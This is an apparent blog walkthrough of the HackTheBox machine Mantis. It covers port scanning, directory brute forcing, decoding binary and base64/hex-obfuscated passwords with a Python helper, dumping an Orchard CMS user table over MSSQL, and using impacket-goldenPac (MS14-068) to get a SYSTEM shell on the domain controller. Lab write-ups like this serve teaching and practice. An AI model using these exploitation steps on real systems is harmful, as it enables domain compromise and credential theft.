In this blog we will walk through the HackTheBox machine Mantis.
Executive Summary
Initial Exploitation
The initial foothold came from encoded credentials exposed by the web server: an OrchardCMS admin password written out in binary, and an MSSQL password hidden (base64 over hex) in a file name.
Enumerating the Orchard database over MSSQL then exposed cleartext credentials for a domain-joined user, James, which gave us our first authenticated access to the domain.
Privilege Escalation
We escalated to domain administrator via MS14-068: the unpatched domain controller accepts a forged PAC, so a ticket for the low-privileged user James could claim Domain Admins membership. That let us impersonate a highly privileged account and compromise the domain controller as SYSTEM.
Enumeration
Nmap Service Scan
root@kali ~/h/mantis# nmap -p 53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389,10475,26347,49152,49153,49154,49155,49157,49158,49164,49165,49171,50255 -sC -sV 10.10.10.52
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 01:41 EDT
Nmap scan report for 10.10.10.52
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-29 05:41:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1337/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2022-06-29T05:42:32+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-29T05:21:55
|_Not valid after: 2052-06-29T05:21:55
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp open mc-nmf .NET Message Framing
10475/tcp closed unknown
26347/tcp closed unknown
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49164/tcp closed unknown
49165/tcp closed unknown
49171/tcp closed unknown
50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2022-06-29T05:42:32+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-29T05:21:55
|_Not valid after: 2052-06-29T05:21:55
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 34m21s, deviation: 1h30m43s, median: 3s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2022-06-29T01:42:23-04:00
| smb2-time:
| date: 2022-06-29T05:42:24
|_ start_date: 2022-06-29T05:20:25
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.41 seconds
Nmap Full Port Scan
root@kali ~/h/mantis# nmap -p- --min-rate 10000 10.10.10.52
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 01:24 EDT
Warning: 10.10.10.52 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.52
Host is up (0.12s latency).
Not shown: 65488 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1337/tcp open waste
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
8080/tcp open http-proxy
9389/tcp open adws
10815/tcp filtered unknown
10955/tcp filtered unknown
16140/tcp filtered unknown
17498/tcp filtered unknown
17739/tcp filtered unknown
24594/tcp filtered unknown
28049/tcp filtered unknown
31078/tcp filtered unknown
32215/tcp filtered unknown
33450/tcp filtered unknown
36143/tcp filtered unknown
36553/tcp filtered unknown
41599/tcp filtered unknown
42798/tcp filtered unknown
45124/tcp filtered unknown
46940/tcp filtered unknown
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49167/tcp open unknown
49178/tcp open unknown
49182/tcp open unknown
50255/tcp open unknown
50358/tcp filtered unknown
55892/tcp filtered unknown
58869/tcp filtered unknown
61491/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 15.50 seconds
Port 88 Kerberos
The nmap scan tells us the domain is htb.local and the host is mantis.htb.local; add both to /etc/hosts (10.10.10.52 mantis.htb.local htb.local), since the Kerberos tooling used later needs the names to resolve. Valid domain users can be enumerated against Kerberos on this port with kerbrute.
Port 1337 HTTP
IIS on port 1337 only serves its default page, so we brute force directories with gobuster:
root@kali ~/h/mantis# gobuster dir -u http://10.10.10.52:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.52:1337
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/29 01:54:04 Starting gobuster in directory enumeration mode
===============================================================
/orchard (Status: 500) [Size: 3026]
/secure_notes (Status: 301) [Size: 160] [--> http://10.10.10.52:1337/secure_notes/]
We have an interesting find: secure_notes.
The directory listing contains a text file whose name is a long string. Scrolling to the bottom of the file we find:
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez
The OrchardCMS string is not encrypted, only obfuscated: it is ASCII written out as 8-bit binary, 120 bits for 15 characters. Decoding it (for example with perl's pack "B*") gives the admin password @dm!n_P@ssW0rd!.
Those credentials (admin / @dm!n_P@ssW0rd!) log us into the Orchard admin panel at http://10.10.10.52:8080/admin. I actually played with the Orchard admin panel for a while, but surprisingly wasn't able to get RCE from it.
For SQL Server the note points at the file name itself: dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt. The middle part is base64; decoding it yields a string of hex.
Decoding that hex gives a second password, m$$ql_S@_P@ssW0rd!, specifically for MSSQL.
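Both decoding steps above, and the general trick of peeling such layers off one at a time until readable text falls out, as an added Python example that is not part of the original walkthrough. It uses only the two strings shown on this page; the helper names, the layer order tried, and the assumed dev_notes_<token> file-name pattern are my own choices.

```python
import base64
import binascii
import string

# The two strings recovered from secure_notes on Mantis, copied from the page.
ORCHARD_BITS = "010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001"
SA_NOTE_NAME = "dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt"

PRINTABLE = set(string.printable)


def decode_binary(s: str) -> str:
    """Treat s as ASCII written out as 8-bit binary (what the Orchard note uses)."""
    if not s or len(s) % 8 or set(s) - {"0", "1"}:
        raise ValueError("not an 8-bit binary string")
    return "".join(chr(int(s[i:i + 8], 2)) for i in range(0, len(s), 8))


def decode_base64(s: str) -> str:
    # validate=True rejects characters outside the base64 alphabet instead of
    # silently dropping them, so a non-base64 string fails here rather than
    # producing garbage that a later layer might misinterpret.
    return base64.b64decode(s, validate=True).decode("ascii")


def decode_hex(s: str) -> str:
    return bytes.fromhex(s).decode("ascii")


# Order matters: a binary string is also syntactically valid base64, and so is a
# hex string of suitable length, so the most restrictive alphabet is tried first.
LAYERS = (("binary", decode_binary), ("base64", decode_base64), ("hex", decode_hex))


def peel(s: str, max_depth: int = 5) -> list:
    """Strip encoding layers until nothing decodes to printable text any more.

    Returns the trail as (layer_name, value) pairs, starting with ("raw", s),
    so the caller can see which encodings were stacked and in what order.
    """
    trail = [("raw", s)]
    for _ in range(max_depth):
        for name, fn in LAYERS:
            try:
                out = fn(s)
            except (ValueError, binascii.Error, UnicodeDecodeError):
                continue
            if out and set(out) <= PRINTABLE:
                trail.append((name, out))
                s = out
                break
        else:
            break  # no layer produced printable text: we have reached the plaintext
    return trail


def note_token(filename: str) -> str:
    """Pull the encoded part out of a dev_notes_<token>.txt.txt file name.

    The naming pattern is an assumption on my part; the page shows only this one file.
    """
    return filename.split("_", 2)[2].split(".", 1)[0]


def recover_credentials() -> dict:
    """Run both notes through peel() and return the final plaintext of each."""
    return {
        "orchard_admin": peel(ORCHARD_BITS)[-1][1],
        "mssql": peel(note_token(SA_NOTE_NAME))[-1][1],
    }


if __name__ == "__main__":
    for label, trail in (("orchard_admin", peel(ORCHARD_BITS)),
                         ("mssql", peel(note_token(SA_NOTE_NAME)))):
        print(label, " -> ".join(f"{name}:{value}" for name, value in trail))
```

The trail for the MSSQL note comes out as raw, base64, hex, which is exactly the two-step decode described above; the Orchard note needs a single binary layer. Because each candidate decoder must produce fully printable text before its output is accepted, a wrong guess (such as base64-decoding the hex string) is discarded rather than propagated.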
Exploitation
MSSQL Enumeration
The note speaks of sa credentials, but the recovered password works for the SQL login admin. Using mssqlclient from impacket to get access to the database:
root@kali ~/h/mantis# impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!@10.10.10.52'
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL>
Now we start enumerating. First list the databases and switch to the Orchard one:
SQL> SELECT name FROM master.dbo.sysdatabases
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
orcharddb
SQL> use orcharddb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
Inside orcharddb, list the tables:
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES; -- list the tables
We found an interesting table called -> blog_Orchard_Users_UserPartRecord
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord'
All_Columns
--------------------------------------------------------------------------------------------------------------------------------
Id
UserName
Email
NormalizedUserName
Password
PasswordFormat
HashAlgorithm
PasswordSalt
RegistrationStatus
EmailStatus
EmailChallengeToken
CreatedUtc
LastLoginUtc
LastLogoutUtc
The columns that matter here are UserName and Password:
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
UserName Password
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
admin AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
James J@m3s_P@ssW0rd!
The password for James is stored in cleartext: J@m3s_P@ssW0rd!. Orchard can store passwords hashed, as the admin row (and the PasswordFormat, HashAlgorithm and PasswordSalt columns) shows; the James account was simply stored in clear.
Privilege Escalation
We now know James is a domain user. Domain controllers missing the MS14-068 patch (CVE-2014-6324) fail to properly validate the signature on the PAC inside a Kerberos ticket, so any authenticated domain user can forge a PAC claiming Domain Admins membership and have the KDC accept it. This is often described as obtaining a golden ticket without being an admin, but no krbtgt hash is involved: the forged PAC is simply accepted by the unpatched KDC.
If you want to know more about it, I've written a blog on it; kindly refer to it for a better understanding.
To exploit this we use impacket's goldenPac.py, which Kali ships as the wrapper impacket-goldenPac. It needs a valid domain user's password, the DC address, and a target name that resolves, so mantis.htb.local must be in /etc/hosts. The tool does the whole chain: it requests a ticket for James carrying the forged PAC, then, with the administrative access that grants, uploads a service binary over ADMIN$ and starts it PSExec-style, which is why the output below shows a file upload and a service being created. That is noisy on a real engagement.
root@kali ~/h/mantis# impacket-goldenPac -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/James@mantis.htb.local
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller 10.10.10.52
[*] 10.10.10.52 found vulnerable!
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
[*] Uploading file XQisLrtc.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service zywl on 10.10.10.52.....
[*] Starting service zywl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system